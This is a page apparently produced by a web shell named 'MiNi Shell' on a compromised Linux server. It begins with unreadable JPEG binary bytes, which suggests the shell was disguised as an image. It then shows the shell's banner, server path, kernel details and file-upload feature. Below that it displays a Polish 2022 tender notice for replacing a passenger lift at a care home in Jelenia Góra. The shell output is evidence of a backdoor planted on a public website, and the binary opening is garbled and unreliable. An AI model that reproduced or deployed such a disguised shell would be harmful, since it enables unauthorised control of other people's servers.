JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20220307/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20220307/0007786001-N-2022.html

<!-- Version 1.0.0 --><style type="text/css"> .normal { color: black; } h1.title { }</style> <h1 class="text-center mt-5 mb-5">Ogłoszenie o zamówieniu<br/> Roboty budowlane<br/> &#34;DPS Pogodna Jesień<br/> Budowa dźwigu osobowego&#34; </h1> <h2 class="bg-light p-3 mt-4">SEKCJA I - ZAMAWIAJĄCY</h2> <h3 class="mb-0">1.1.) Rola zamawiającego</h3> <p class="mb-0">Postępowanie prowadzone jest samodzielnie przez zamawiającego</p> <h3 class="mb-0">1.2.) Nazwa zamawiającego: <span class="normal">Dom Pomocy Społecznej &#34;Pogodna Jesień&#34;</span></h3> <h3 class="mb-0">1.3.) Oddział zamawiającego: <span class="normal">DPS PJ</span></h3> <h3 class="mb-0">1.4) Krajowy Numer Identyfikacyjny: <span class="normal">REGON 021756486</span></h3><h3 class="mb-0">1.5) Adres zamawiającego </h3> <h3 class="mb-0">1.5.1.) Ulica: <span class="normal">Leśna 3</span></h3> <h3 class="mb-0">1.5.2.) Miejscowość: <span class="normal">Jelenia Góra</span></h3> <h3 class="mb-0">1.5.3.) Kod pocztowy: <span class="normal">58-560</span></h3> <h3 class="mb-0">1.5.4.) Województwo: <span class="normal">dolnośląskie</span></h3> <h3 class="mb-0">1.5.5.) Kraj: <span class="normal">Polska</span></h3> <h3 class="mb-0">1.5.6.) Lokalizacja NUTS 3: <span class="normal">PL515 - Jeleniogórski</span></h3> <h3 class="mb-0">1.5.7.) Numer telefonu: <span class="normal">75 75 520 38, wew.: 360</span></h3> <h3 class="mb-0">1.5.9.) Adres poczty elektronicznej: <span class="normal">sekretariat@dpspogodnajesien.pl</span></h3> <h3 class="mb-0">1.5.10.) Adres strony internetowej zamawiającego: <span class="normal">dpspogodnajesien.pl</span></h3> <h3 class="mb-0"> 1.6.) Rodzaj zamawiającego: <span class="normal">Zamawiający publiczny - jednostka sektora finansów publicznych - jednostka budżetowa</span> </h3> <h3 class="mb-0"> 1.7.) Przedmiot działalności zamawiającego: <span class="normal">Ochrona socjalna</span> </h3> <h2 class="bg-light p-3 mt-4">SEKCJA II – INFORMACJE PODSTAWOWE</h2> <h3 class="mb-0">2.1.) Ogłoszenie dotyczy: </h3> <p class="mb-0"> Zamówienia publicznego </p> <h3 class="mb-0">2.2.) Ogłoszenie dotyczy usług społecznych i innych szczególnych usług: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.3.) Nazwa zamówienia albo umowy ramowej: </h3> <p class="mb-0"> &#34;DPS Pogodna Jesień<br/> Budowa dźwigu osobowego&#34; </p> <h3 class="mb-0">2.4.) Identyfikator postępowania: <span class="normal">ocds-148610-1828be3d-9dfe-11ec-80f8-1ad70aec7fa4</span></h3> <h3 class="mb-0">2.5.) Numer ogłoszenia: <span class="normal">2022/BZP 00077860</span></h3> <h3 class="mb-0">2.6.) Wersja ogłoszenia: <span class="normal">01</span></h3> <h3 class="mb-0">2.7.) Data ogłoszenia: <span class="normal">2022-03-07</span></h3> <h3 class="mb-0">2.8.) Zamówienie albo umowa ramowa zostały ujęte w planie postępowań: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.11.) O udzielenie zamówienia mogą ubiegać się wyłącznie wykonawcy, o których mowa w art. 94 ustawy: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.14.) Czy zamówienie albo umowa ramowa dotyczy projektu lub programu współfinansowanego ze środków Unii Europejskiej: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.16.) Tryb udzielenia zamówienia wraz z podstawą prawną</h3> <p class="mb-0"> Zamówienie udzielane jest w trybie podstawowym na podstawie: art. 275 pkt 1 ustawy </p> <h2 class="bg-light p-3 mt-4">SEKCJA III – UDOSTĘPNIANIE DOKUMENTÓW ZAMÓWIENIA I KOMUNIKACJA</h2> <h3 class="mb-0">3.1.) Adres strony internetowej prowadzonego postępowania</h3> www.dpspogodnajesien.pl <h3 class="mb-0">3.2.) Zamawiający zastrzega dostęp do dokumentów zamówienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">3.4.) Wykonawcy zobowiązani są do składania ofert, wniosków o dopuszczenie do udziału w postępowaniu, oświadczeń oraz innych dokumentów wyłącznie przy użyciu środków komunikacji elektronicznej: <span class="normal">Nie</span></h3> <h3 class="mb-0">3.5.) Informacje o środkach komunikacji elektronicznej, przy użyciu których zamawiający będzie komunikował się z wykonawcami - adres strony internetowej: <span class="normal">www.dpspogodnajesien.pl</span></h3> <h3 class="mb-0">3.8.) Zamawiający wymaga sporządzenia i przedstawienia ofert przy użyciu narzędzi elektronicznego modelowania danych budowlanych lub innych podobnych narzędzi, które nie są ogólnie dostępne: <span class="normal">Nie</span></h3> <h3 class="mb-0">3.10.) Przyczyny odstąpienia od komunikacji elektronicznej: </h3> <p class="mb-0">użycie środków komunikacji elektronicznej wymaga pozyskania przez zamawiającego specjalistycznego sprzętu biurowego (art. 65 ust. 1 pkt 3 ustawy)</p> <h3 class="mb-0">3.11.) Sposób nieelektronicznego składania ofert, wniosków, oświadczeń oraz innych dokumentów: <span class="normal">1.	Oferty należy złożyć osobiście na adres Zamawiającego: Miasto Jelenia Góra - Dom Pomocy Społecznej &#34;Pogodna Jesień&#34;, ul. Leśna 3, 58-560 Jelenia Góra lub wysłać przez Pocztę Polską lub firmę kurierską w wyznaczonym terminie.<br/>2.	Ofertę należy złożyć w zamkniętej kopercie zaadresowanej na Zamawiającego wraz z podaniem nazwy i adresu oferenta wraz z dopiskiem:<br/>OFERTA:<br/>„DPS Pogodna Jesień <br/>Budowa dźwigu osobowego&#34;<br/>SWZ/1/2022</span></h3> <h3 class="mb-0">3.12.) Oferta - katalog elektroniczny: <span class="normal">Nie dotyczy</span></h3> <h3 class="mb-0">3.14.) Języki, w jakich mogą być sporządzane dokumenty składane w postępowaniu: </h3> <p class="mb-0">polski</p> <h3 class="mb-0">3.15.) RODO (obowiązek informacyjny): <span class="normal">Załącznik nr 10 do SWZ/1/2022</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA IV – PRZEDMIOT ZAMÓWIENIA</h2><h3 class="mb-0">4.1.) Informacje ogólne odnoszące się do przedmiotu zamówienia.</h3> <h3 class="mb-0">4.1.1.) Przed wszczęciem postępowania przeprowadzono konsultacje rynkowe: <span class="normal">Tak</span></h3> <h3 class="mb-0">4.1.2.) Numer referencyjny: <span class="normal">DPS&#34;PJ&#34;.S.271.1.2022</span></h3> <h3 class="mb-0">4.1.3.) Rodzaj zamówienia: <span class="normal">Roboty budowlane</span></h3> <h3 class="mb-0">4.1.4.) Zamawiający udziela zamówienia w częściach, z których każda stanowi przedmiot odrębnego postępowania: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.8.) Możliwe jest składanie ofert częściowych: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.13.) Zamawiający uwzględnia aspekty społeczne, środowiskowe lub etykiety w opisie przedmiotu zamówienia: <span class="normal">Tak</span></h3> <h3 class="mb-0">4.1.14.) Określenie aspektów społecznych, środowiskowych lub etykiet w opisie przedmiotu zamówienia: </h3> <p class="mb-0">Zamawiający uwzględnił wymagania w zakresie dostępności dla osób niepełnosprawnych oraz projektowania z przeznaczeniem dla wszystkich użytkowników, zgodnie z art. 100 ust. 1 ustawy</p><h3 class="mb-0">4.2. Informacje szczegółowe odnoszące się do przedmiotu zamówienia:</h3> <h3 class="mb-0">4.2.2.) Krótki opis przedmiotu zamówienia</h3> <p class="mb-0"> W ramach zamówienia Wykonawca zdemontuje stary dźwig oraz dostarczy i zamontuje dźwig spełniający wymogi dyrektywy 2014/33/UE i PN-EN 81.20 oraz inne aktualnie obowiązujące normy i przepisy dotyczące dźwigów osobowych montowanych i eksploatowanych w budynkach mieszkalnych, wielorodzinnych, a także poniższe, główne parametry techniczne:<br/>1.	Dźwig osobowy, elektryczny.<br/>2.	Wciągarka bezreduktorowa.<br/>3.	Moduł łączności na GSM.<br/>4.	Aparatura sterowa:<br/>a)	sterownik mikroprocesorowy zintegrowany z falownikiem,<br/>b)	sterowanie - w okresie gwarancji jak i po niej swobodna możliwość konserwacji windy przez firmę posiadającą uprawnienia do konserwacji wydane przez UDT po okresie gwarancji wskazana przez Zamawiajacego,<br/>5.	Maszynownia umiejscowiona w szybie windy.<br/>6.	Zespół napędowy umiejscowiony w nadszybiu.<br/>6.	Liny nośne stalowe (nie w otulinie), nie pasy nośne.<br/>7.	Kasety wezwań - przyciski wciskane.<br/>8.	Panel dyspozycji - ze stali nierdzewnej, przyciski wciskane.<br/>9.	Drzwi kabinowe – o wymiarach 900x2000.<br/>10.	Drzwi szybowe – o wymiarach 900x2000.<br/>11.	Powierzchnia kabiny: min. 2,30 m2, wymiary kabiny wew.: (SxG): 1100 mm x 2100 mm.<br/>12.	Wymiary kabiny zmaksymalizowane (zgodnie z PN-EN 81.20).<br/>13.	Udźwig: min. Q = 1000 kg / min. 13 osób lub większy (większa ilość osób).<br/>14.	Prędkość jazdy V=1,0 m/s.<br/>15.	Wysokość podnoszenia – do ustalenia przez Oferenta podczas wizji w terenie.<br/>16.	Ilość przystanków = 5.<br/>17.	Wymagania dotyczące kabiny:<br/>a)	kabina bez przelotu, stalowa,<br/>b)	ściany kabiny wykonane ze stali plastyfikowanej lub malowanej proszkowo - kolor do uzgodnienia,<br/>c)	sufit z oświetleniem LED z funkcją wygaszania,<br/>d)	poręcz okrągła na ścianie bocznej ze stali nierdzewnej, <br/>e)	odboje na ścianach kabiny,<br/>f)	cokoły przypodłogowe ze stali nierdzewnej,<br/>g)	lustro na bocznej ścianie nad poręczą - na 1/2 wysokości kabiny,<br/>h)	podłoga pokryta wykładziną antypoślizgową, trudnościeralną i niepalną,<br/>i)	wejście do kabiny zabezpieczone kurtyną świetlną - wiązka świetlna wykrywająca osoby/rzeczy w strefie zamykania drzwi oraz łącznik rewersyjny,<br/>j)	czytelny panel sterowy ze stali nierdzewnej, na całej wysokości kabiny, łatwy do utrzymania w czystości,<br/>k)	wyświetlacz LCD z funkcjami wyświetlania - kierunek jazdy, położenie kabiny, komunikat przeciążenia, komunikat nawiązania łączności, alarm,<br/>l)	przyciski funkcyjne - alarm, wentylator, otwieranie i zamykanie drzwi, przyciski wciskane (nie dotykowe),<br/>m)	akustyczny sygnalizator dojazdu kabiny do przystanku zabudowany na kabinie,<br/>n)	drzwi kabinowe i szybowe automatyczne, wykonane ze stali malowanej proszkowo lub stali plastyfikowanej - kolor do uzgodnienia,<br/>o)	na każdym przystanku wyświetlacz,<br/>p)	oświetlenie awaryjne działające min. 2 h,<br/>q)	w przypadku zaniku napięcia, awaryjne zasilanie sterowania i dojazd do najbliższego przystanku z otwarciem drzwi. </p> <h3 class="mb-0">4.2.6.) Główny kod CPV: <span class="normal">42416100-6 - Windy</span></h3> <h3 class="mb-0">4.2.8.) Zamówienie obejmuje opcje: <span class="normal">Nie</span></h3> <!-- realizacja do --> <h3 class="mb-0">4.2.10.) Okres realizacji zamówienia albo umowy ramowej: <span class="normal">do 2022-09-30</span></h3> <h3 class="mb-0">4.2.11.) Zamawiający przewiduje wznowienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.13.) Zamawiający przewiduje udzielenie dotychczasowemu wykonawcy zamówień na podobne usługi lub roboty budowlane: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.3.) Kryteria oceny ofert</h3> <h3 class="mb-0">4.3.1.) Sposób oceny ofert: <span class="normal">Według kryteriów.</span></h3> <h3 class="mb-0">4.3.2.) Sposób określania wagi kryteriów oceny ofert: <span class="normal"> Procentowo </span></h3> <h3 class="mb-0">4.3.3.) Stosowane kryteria oceny ofert: <span class="normal"> Kryterium ceny oraz kryteria jakościowe </span></h3> <h3 class="mb-0">Kryterium 1</h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Cena</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">80</span></h3> <h3 class="mb-0">Kryterium 2</h3> <h3 class="mb-0">4.3.4.) Rodzaj kryterium: </h3> serwis posprzedażny, pomoc techniczna, warunki dostawy takich jak termin, sposób lub czas dostawy, oraz okresu realizacji. <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Dostępność bazy serwisowej</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">10</span></h3> <h3 class="mb-0">Kryterium 3</h3> <h3 class="mb-0">4.3.4.) Rodzaj kryterium: </h3> serwis posprzedażny, pomoc techniczna, warunki dostawy takich jak termin, sposób lub czas dostawy, oraz okresu realizacji. <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Miesięczny koszt serwisu dźwigu</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">10</span></h3> <h3 class="mb-0">4.3.10.) Zamawiający określa aspekty społeczne, środowiskowe lub innowacyjne, żąda etykiet lub stosuje rachunek kosztów cyklu życia w odniesieniu do kryterium oceny ofert: <span class="normal">Nie</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA V - KWALIFIKACJA WYKONAWCÓW</h2> <h3 class="mb-0">5.1.) Zamawiający przewiduje fakultatywne podstawy wykluczenia: <span class="normal">Tak</span></h3> <h3 class="mb-0">5.2.) Fakultatywne podstawy wykluczenia: </h3> <p class="mb-0">Art. 109 ust. 1 pkt 1</p> <p class="mb-0">Art. 109 ust. 1 pkt 3</p> <p class="mb-0">Art. 109 ust. 1 pkt 4</p> <p class="mb-0">Art. 109 ust. 1 pkt 5</p> <p class="mb-0">Art. 109 ust. 1 pkt 6</p> <p class="mb-0">Art. 109 ust. 1 pkt 7</p> <p class="mb-0">Art. 109 ust. 1 pkt 8</p> <p class="mb-0">Art. 109 ust. 1 pkt 9</p> <p class="mb-0">Art. 109 ust. 1 pkt 10</p> <h3 class="mb-0">5.3.) Warunki udziału w postępowaniu: <span class="normal">Tak</span></h3> <h3 class="mb-0">5.4.) Nazwa i opis warunków udziału w postępowaniu.</h3> I.	W zakresie doświadczenia: <br/>1.	Wykonawca spełni warunek, jeśli wykaże, że w okresie ostatnich 5 lat przed upływem terminu składania ofert, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie wykonał w sposób należyty, zgodnie z zasadami sztuki budowlanej i prawidłowo ukończył minimum 1 robotę budowlaną polegającą na wymianie, budowie, przebudowie lub remoncie budynku obejmującą swoim zakresem montaż lub wymianę lub remont dźwigu osobowego lub towarowego dla ww. zakresu<br/><br/>II.	W zakresie posiadanych ubezpieczeń:<br/>Oferent złoży wraz z ofertą:<br/>1.	potwierdzenie posiadania Polisy ubezpieczeniowej – w zakresie opisanym w punkcie 16, „Obowiązki Wykonawcy” (str. 5 SWZ) – na wartość nie mniejszą niż równowartość 400.000,00 zł (słownie: czterysta tysięcy złotych 00/100) – od odpowiedzialności cywilnej za ewentualne szkody wyrządzone w trakcie realizacji przedmiotu zamówienia lub deklarację przedłożenia takiej polisy w dniu podpisania umowy, należy dołączyć do oferty.<br/>2.	oryginały lub kopie (potwierdzone za zgodność z oryginałem), zaświadczeń: o niezaleganiu z uiszczeniem opłat lub składek na ubezpieczenia społeczne lub zdrowotne oraz o uiszczaniu podatków lub<br/>przedłożenie dokumentów właściwego organu o zwolnieniu,<br/> odroczeniu, rozłożeniu na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu. Termin ważności zaświadczeń – 3 m-ce w odniesieniu do terminu złożenia oferty. <h3 class="mb-0">5.5.) Zamawiający wymaga złożenia oświadczenia, o którym mowa w art.125 ust. 1 ustawy: <span class="normal">Tak</span></h3> <h3 class="mb-0"> 5.7.) Wykaz podmiotowych środków dowodowych na potwierdzenie spełniania warunków udziału w postępowaniu: <span class="normal">1. Aktualny odpis z właściwego rejestru albo aktualnego zaświadczenia o wpisie do ewidencji działalności gospodarczej, jeżeli odrębne przepisy wymagają wpisu do rejestru lub zgłoszenia<br/>do ewidencji działalności gospodarczej, wystawionego nie wcześniej niż 6 miesięcy przed upływem terminu składania ofert.<br/>2. Aktualne zaświadczenie z Urzędu Skarbowego oraz właściwego oddziału Zakładu Ubezpieczeń Społecznych potwierdzających odpowiednio, że oferent nie zalega z opłacaniem podatków, opłat oraz składek na ubezpieczenie zdrowotne lub społeczne, lub zaświadczeń, że uzyskał zgodę na zwolnienie, odroczenie lub rozłożenie na raty zaległości, lub wstrzymanie w całości wykonania decyzji organu podatkowego wystawionych nie wcześniej niż 6 miesięcy przed upływem terminu składania ofert.</span> </h3> <h3 class="mb-0">5.8.) Wykaz przedmiotowych środków dowodowych: </h3> 1.Zgodnie ze szczegółowym przedmiotem zamówienia punkt II (prace pomiarowe i dokumentacyjne).<br/>2. Gwarancja zgodnie z załącznikiem nr do SWZ/1/2021 <h3 class="mb-0">5.9.) Zamawiający przewiduje uzupełnienie przedmiotowych środków dowodowych: <span class="normal">Nie</span></h3> <h3 class="mb-0">5.11.) Wykaz innych wymaganych oświadczeń lub dokumentów: </h3> 1.	Załącznik nr 1 – Formularz oferty, zawierający:<br/>a)	całkowite wynagrodzenie ryczałtowe za wykonanie przedmiotu zamówienia,<br/>b)	dostępność bazy serwisowej na terenie Jeleniej Góry,<br/>c)	wynagrodzenie za sprawowanie serwisu gwarancyjnego w przeliczeniu na miesiąc za dźwig,<br/>d)	udzielony okres gwarancji.<br/>2.	Załącznik nr 2 – Wykaz dostawców części zamiennych, zawierający adresy i kontakty (telefony/ adresy mailowe) do dostawców części zamiennych niepowiązanych ze sobą nawzajem i niepowiązanych z Oferentem, którzy sprzedają części zamienne do oferowanego urządzenia dźwigowego.<br/>3.	Załącznik nr 3 – Oświadczenie o braku podstaw do wykluczenia<br/>4.	Załącznik nr 4 – Zaparafowany projekt umowy wraz załącznikami do umowy.<br/>5.	Załącznik nr 5 – Wykaz ważniejszych realizacji z okresu ostatnich<br/>pięciu lat w zakresie wymiany dźwigów lub remontów głównych.<br/>6.	Załącznik nr 6 – Wykaz podwykonawców.<br/>7.	Załącznik nr 7 – Oświadczenie o akceptacji dokumentów przetargowych.<br/>8.	Załącznik nr 8 – Oświadczenie o zachowaniu tajemnicy handlowej.<br/>9.	Załącznik nr 9 – Oświadczenie o posiadaniu (lub nie) na terenie Jeleniej Góry bazy serwisowej lub wskazanie firmy, z którą Oferent współpracuje na terenie Jeleniej Góry lub będzie współpracował, w zakresie zapewnienia ciągłości eksploatacji zamontowanych urządzeń dźwigowych.<br/>10.	Załącznik nr 10 – Informacja o przetwarzaniu danych osobowych.<br/>11.	Referencje od użytkowników dźwigów, których wymianę w ostatnim<br/>roku realizował Oferent i ewentualne inne dodatkowe informacje oraz opinie o oferowanym urządzeniu, w tym opinie użytkowników.<br/>12.	Dowód wniesienia wadium.<br/>13.	Projekt umowy serwisowej, zawierający zapis o czasie reakcji na zgłoszoną awarię lub usterkę do 0,5 godzin.<br/>14.	Potwierdzenie posiadania ubezpieczenia od odpowiedzialności cywilnej w zakresie prowadzenia działalności zgodnej z przedmiotem zamówienia na kwotę co najmniej 400 000,00 zł (na jeden wypadek niezależnie od ilości zdarzeń) lub oświadczenie o przedłożeniu takiej polisy w dniu podpisywania umowy na realizację przedmiotu zamówienia. <h2 class="bg-light p-3 mt-4">SEKCJA VI - WARUNKI ZAMÓWIENIA</h2> <h3 class="mb-0">6.1.) Zamawiający wymaga albo dopuszcza oferty wariantowe: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.3.) Zamawiający przewiduje aukcję elektroniczną: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.4.) Zamawiający wymaga wadium: <span class="normal">Tak</span></h3> <h3 class="mb-0">6.4.1) Informacje dotyczące wadium: </h3> Wysokość : 5 000,00 PLN<br/>Wadium musi być wniesione przed upływem terminu składania ofert w pieniądzu.<br/>Wadium musi być na koncie Domu Pomocy Społecznej &#34;Pogodna Jesień&#34; w momencie otwarcia ofert – tylko Oferenci, którzy wpłacili wadium do tego czasu wezmą udział w otwarciu ofert.<br/>Wadium musi być wpłacone z konta firmy Oferenta, która dotyczy złożonej oferty. Zamawiający nie wyraża zgody na dokonywanie wpłaty wadium z kont prywatnych Oferenta, kont firm powiązanych z firmą Oferenta lub kont należących do firmy Oferenta, a które nie dotyczą złożonej oferty.<br/>Oferent, którego oferta nie zostanie zabezpieczona wadium w wymaganej wysokości i formie oraz w wymaganym terminie, zostanie wykluczony z postępowania.<br/>Wadium wnoszone w pieniądzu należy wpłacić na następujący rachunek Zamawiającego:<br/><br/>Bank Millennium S.A. 80 1160 2202 0000 0002 0338 5569 z dopiskiem:<br/>„Wadium - SWZ/1/2022”<br/>Do oferty należy dołączyć kopię polecenia przelewu poświadczoną „za zgodność z oryginałem”. <h3 class="mb-0">6.5.) Zamawiający wymaga zabezpieczenia należytego wykonania umowy: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.7.) Zamawiający przewiduje unieważnienie postępowania, jeśli środki publiczne, które zamierzał przeznaczyć na sfinansowanie całości lub części zamówienia nie zostały przyznane: <span class="normal">Nie</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA VII - PROJEKTOWANE POSTANOWIENIA UMOWY</h2> <h3 class="mb-0">7.1.) Zamawiający przewiduje udzielenia zaliczek: <span class="normal">Nie</span></h3> <h3 class="mb-0">7.3.) Zamawiający przewiduje zmiany umowy: <span class="normal">Nie</span></h3> <h3 class="mb-0">7.5.) Zamawiający uwzględnił aspekty społeczne, środowiskowe, innowacyjne lub etykiety związane z realizacją zamówienia: <span class="normal">Nie</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA VIII – PROCEDURA</h2> <h3 class="mb-0">8.1.) Termin składania ofert: <span class="normal">2022-03-22 10:00</span></h3> <h3 class="mb-0">8.2.) Miejsce składania ofert: <span class="normal">Dom Pomocy Społecznej &#34;Pogodna Jesień&#34;, ul. Leśna 3, 58-560 Jelenia Góra</span></h3> <h3 class="mb-0">8.3.) Termin otwarcia ofert: <span class="normal">2022-03-22 11:00</span></h3> <h3 class="mb-0">8.4.) Termin związania ofertą: <span class="normal"> 45 dni </span></h3>

Creat By MiNi SheLL
Email: jattceo@gmail.com